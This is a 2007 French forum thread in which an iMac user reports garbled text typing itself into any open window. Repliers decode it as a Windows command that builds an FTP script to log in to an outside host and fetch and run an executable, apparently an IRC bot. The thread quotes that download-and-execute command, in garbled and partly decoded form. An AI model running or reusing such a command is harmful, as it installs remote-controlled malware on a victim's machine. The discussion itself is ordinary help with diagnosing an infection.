Un Virus ?

Le
RiGuad
Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :


(syste,root(`syste,ӎ`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit


Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.
Vidéos High-Tech et Jeu Vidéo
Téléchargements
Vos réponses Page 1 / 10
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Eric Levenez
Le #2150461
Le 2/03/07 18:41, dans
Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :

(syste,root(`syste,²é`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit


Tout cela ressemble a ce que l'on envoie pour établir une session ftp (avec
un clavier QWERTY) et récupérer un exécutable windows :

open ftp.hypermart.net
user joh joh
binary
get abc.exe
...


Le site que le soft qui tape ton code clavier est donc : hypermart.net

Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.


As-tu un fichier dans le répertoire ~/Library/InputManagers ?

--
Éric Lévénez -- Unix is not only an OS, it's a way of life.

Nina Popravka
Le #2150451
On Fri, 02 Mar 2007 13:41:39 -0400, RiGuad

(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit


C'est très drôle...
Y a bien un user joh sur ftp.hypermart.net, pass joh...
Mais pas de abc.exe à ramener :-)
--
Nina

Nina Popravka
Le #2150441
On Fri, 02 Mar 2007 13:41:39 -0400, RiGuad

Le plus insupportable est lorsque l'on tchatte avec un ami,


Tu utilises IRC ?
--
Nina

Eric Levenez
Le #2150431
Le 2/03/07 19:00, dans Popravka » a écrit :

On Fri, 02 Mar 2007 13:41:39 -0400, RiGuad

(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit


C'est très drôle...
Y a bien un user joh sur ftp.hypermart.net, pass joh...
Mais pas de abc.exe à ramener :-)


Juste un MP3.

--
Éric Lévénez -- Unix is not only an OS, it's a way of life.


Nina Popravka
Le #2148601
On Fri, 02 Mar 2007 19:18:41 +0100, Eric Levenez wrote:

Juste un MP3.


Même pas taggé et genre latino, assez marrant...
--
Nina

fra
Le #2148541
Nina Popravka wrote:

On Fri, 02 Mar 2007 19:18:41 +0100, Eric Levenez wrote:

Juste un MP3.


Même pas taggé et genre latino, assez marrant...


Y'a peut être des informations à Ben Laden de cachés dedans pour qu'un
gars essaie d'un aller par des moyens détournés.
--
Fra


Nina Popravka
Le #2148371
On Fri, 02 Mar 2007 22:30:06 +0100, Le Moustique

Ah, moi j'ai trouvé un VNC.exe... mais 40 Ko, ça me semble un peu mince.


Ah...
Lui, d'après certains AVs, c'est un bot IRC.
MacAfee, Symantec et Clamav ne voient rien, comme d'hab, tout comme
Avast et AVG, d'ailleurs.
Allez hop, direction la machine de test, je vais le regarder un peu
vivre demain au petit déj :-))))))))
--
Nina

RiGuad
Le #2148351
Oui, j'utilise IRC..

Bon , merci les gars de vos remarques, mais..

1-Comment cette ... "fonction" a t elle pu , toute seule ! , se créer
sur mon Imac G5 ?
2- Comment arreter ce truc ?
3- c'est la premiere fois en 20 ans que mon Mac décide pour moi de ce
qui apparait en texte sur mon ecran, et cela m'inquiete beaucoup. S'il
est capable d'ecrire tout seul, il peut etre capable d'effacer ou de
transmettre mes fichiers tout seul ?
Tout cela est tres flippant.

Euh... Nina , peux tu expliquer ton message précedent... ?

On Fri, 02 Mar 2007 13:41:39 -0400, RiGuad

Le plus insupportable est lorsque l'on tchatte avec un ami,


Tu utilises IRC ?



Nina Popravka
Le #2148311
On Fri, 02 Mar 2007 18:26:45 -0400, RiGuad

S'il
est capable d'ecrire tout seul,
Ca n'est pas lui qui écrit, c'est quelqu'un, et quelqu'un qui utilise

un clavier qwerty. Et qui donne l'ordre de récupérer des fichiers sur
un FTP où je viens de trouver un ravissant virus.

Euh... Nina , peux tu expliquer ton message précedent... ?
Tu dis que tu chattes, je te demande si tu utilises IRC pour le faire.

Parce que de nombreuses saloperies utilisent des canaux IRC pour
contrôler des machines, et le virus que j'ai trouvé est précisément,
je crois (je l'ai pas encore etsté), de cette race.
Donc si tu utilises IRC, il est possible que tu sois tombé sur un truc
comme ça par hasard. Je ne pense d'ailleurs pas que ça puisse avoir la
moindre action sur ta machine.

M'enfin aussi longtemps que tu ne diras pas exactement *où* les
caractères fantômes apparaissent, et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce
soit.
En tout cas, c'est assez amusant et mystérieux comme phénomène, ça
m'intrigue...
--
Nina

RiGuad
Le #2148271
On Fri, 02 Mar 2007 18:26:45 -0400, RiGuad

Donc si tu utilises IRC,
Oui tootafé, tant MSN, avec aMSN que les canaux d'IRC, avec Snak avec

lequel je suis courrament sur Irc.Voila.fr.

M'enfin aussi longtemps que tu ne diras pas exactement *où* les
caractères fantômes apparaissent,
Ces caracteres prennent la main dans n'importe quelles appli, a

n'importe quel moment, avec par exemple une page AppleWorks vierge ouverte.
C'est d'ailleurs comme ca que j'ai pu le faire ecrire ce que je vous ai
envoyé. suis parti au boulot, en laissant mon curseur sur une page de
traitement de texte vierge
Mon Mac était alors connecté au Net.

et que ne feras pas un netstat -a,
puis posteras le résultat ici, ça sera difficile de dire quoi que ce
soit.
Dis moi comment faire ca , stp.


En tout cas, c'est assez amusant et mystérieux comme phénomène, ça
m'intrigue...


Publicité
Poster une réponse
Anonyme